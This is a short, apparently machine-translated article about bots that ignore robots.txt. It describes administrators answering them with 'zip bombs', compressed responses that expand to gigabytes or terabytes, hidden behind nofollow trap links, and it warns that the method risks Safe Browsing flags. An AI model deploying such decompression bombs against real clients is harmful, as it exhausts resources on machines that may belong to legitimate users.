Increased Activity of Web-bots |
---|
Recently, the activity of Web-bots that indexing traffic has increased significantly. In addition to the correctly working bots, “frantic” bots that ignore the Robots.txt indexing rules, which are climbing from tens of thousands of different IPs, pretending to legitimate users and are not adhering to the rational policy of the intensity of sending requests. These bots create a huge parasitic load on servers, violate the normal performance of systems and take away the time of administrators. The activity of such bots is perceived by many as harmful actions. |
Use of “Zip Bombs” to Slow Down Bots |
---|
As a measure for slowing down the activity of such bots, as well as bots scanning incorrect vulnerability in typical web applications, one of the administrators was suggested the “zip bombs” method. The essence of the method is that in response to a page request, the content is conveyed by the contents, which is effectively compressed by the Deflate method, the size of which when unpacking is multiple more than the size of the data transferred on the network. For example, when using the “Deflate” method, the contents of /dev /zero, packed at 10 MB, will require 1 GB of disk space during unpacking. Atusing the brotli compression method was achieved at which the transmission of 81 MB leads to unpacking 100 TB data. |
Activation of Protection Through Traps |
---|
You can activate such protection through the creation of traps that are available on invisible links marked with the flag ‘Rel = “Nofollow”‘, excluded from indexation through Robots.txt and triggered by a fairly high level of recursion for bots trying to pretend ordinary users. In practice, the proposed method is not recommended to use, since in case of accidental indexation of a similar trap by the Google boot, the site can be listed and starts to be marked with harmful Chrome browser with the “Safe Browsing” mode. |